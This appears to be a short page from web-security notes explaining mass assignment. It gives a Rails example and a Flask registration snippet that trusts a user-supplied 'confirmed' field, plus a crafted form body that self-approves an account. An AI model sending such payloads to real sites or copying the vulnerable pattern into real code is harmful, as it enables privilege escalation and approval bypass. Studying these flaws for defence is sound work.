Web Mass Assignment

Ruby on Rails is a web application framework that is vulnerable to this type of attack.

class User < ActiveRecord::Base
  attr_accessible :username, :email
end

{ "user" => { "username" => "hacker", "email" => "hacker@example.com", "admin" => true } }

Source code:

for i,j,k in cur.execute('select * from users where username=? and password=?',(username,password)):
  if k:
    session['user']=i
    return redirect("/home",code=302)
  else:
    return render_template('login.html',value='Account is pending for approval')

try:
  if request.form['confirmed']:
    cond=True
except:
      cond=False
with sqlite3.connect("database.db") as con:
  cur = con.cursor()
  cur.execute('select * from users where username=?',(username,))
  if cur.fetchone():
    return render_template('index.html',value='User exists!!')
  else:
    cur.execute('insert into users values(?,?,?)',(username,password,cond))
    con.commit()
    return render_template('index.html',value='Success!!')

username=new&password=test&confirmed=test

PreviousPrototype Pollution NextWeb Cache

Last updated 5 months ago